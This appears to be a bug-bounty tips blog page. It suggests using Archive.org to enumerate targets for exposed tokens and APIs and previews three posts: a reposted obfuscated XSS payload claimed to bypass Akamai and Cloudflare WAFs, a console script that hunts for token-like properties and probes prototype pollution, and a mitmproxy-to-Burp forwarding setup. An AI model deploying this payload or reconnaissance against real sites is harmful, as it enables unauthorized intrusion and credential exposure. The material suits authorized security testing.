Use Archive.org to find hidden links, APIs, tokens, JWTs, all sorts of other interesting info on your target

Using https://archive.org (and https://archive.is) are great ways to enumerate your target






hackertips.today

Comments

Post a Comment

Please feel free to sign up and join the discussion or start one

Popular posts from this blog

Repost from LI - New WAF Bypass Discovered - Akamai & Cloudflare

Image
Just found this on LinkedIn - Props goes to Amit for the post AMIT BHAKAR AMIT BHAKAR   • 2nd Verified • 2nd Cyber Security Researcher || Bug Bounty Hunter || Penetration Tester || Ethical Hacker|| Cyber Security Researcher || Bug Bounty Hunter || Penetration Tester || Ethical Hacker|| 1d • 1 day ago • Visible to anyone on or off LinkedIn Pending You have already invited AMIT BHAKAR Bug Bounty tips 👀 New WAF Bypass Discovered - Akamai & Cloudflare 🔥 Original Post Link: https://www.linkedin.com/feed/update/urn:li:activity:7364263906405441537/ A fresh technique has been spotted that successfully bypasses WAFs like Akamai and Cloudflare. Payload -  <address onscrollsnapchange=window['ev'+'a'+(['l','b','c'][0])](window['a'+'to'+(['b','c','d'][0])]('YWxlcnQob3JpZ2luKQ==')); style=overflow-y:hidden;scroll-snap-type:x><div style=scroll-snap-align:center>1337</div></address...
Read more

Analyze Object - Attempt prototype pollution - console / inspect .js code

 // Usage examples: // analyzeObject(window.ga, { name: 'ga' }); // analyzeObject(appState, { name: 'appState', maxDepth: 3, tryPollute: true }); (function () { const SUSPICIOUS_NAME_RE = /(csrf|xsrf|token|auth|secret|session|jwt|apikey|api[-_]?key|bearer|cookie|hdr|header)/i; function analyzeObject(target, { name = '(anonymous)', maxDepth = 2, tryPollute = false, // off by default; if true, adds & removes a probe on the prototype showValues = false // keep false to avoid dumping sensitive values to the console } = {}) { if (target == null || (typeof target !== 'object' && typeof target !== 'function')) { console.warn(`[X] Target '${name}' is not an object/function or is null/undefined.`); return; } console.group(`[?] Analyzing '${name}'`); const ownProps = Object.getOwnPropertyNames(target); console.log(`[^] Own properties (${ownProps.length}):`, ownProps); // Classify const types = ownProps.reduce((ac...
Read more

Configuring Burpsuite with mitmweb / mitmproxy

Image
  Configuring Burp with mitmproxy /mitmweb as root create:  bu.py pip3 install mitmproxy # prereq #  bu.py   # forward_to_burp.py from mitmproxy import http def request(flow: http.HTTPFlow) -> None:     # Forward everything to Burp (localhost:8080)     flow.request.host = "127.0.0.1"     flow.request.port = 8080   Save file Assuming burp is listening on standard 8080. as root run: mitmweb --mode regular --listen-host 127.0.0.1 --listen-port 8888 -s ./bu.py   making sure bu.py is in same path. Burp:
Read more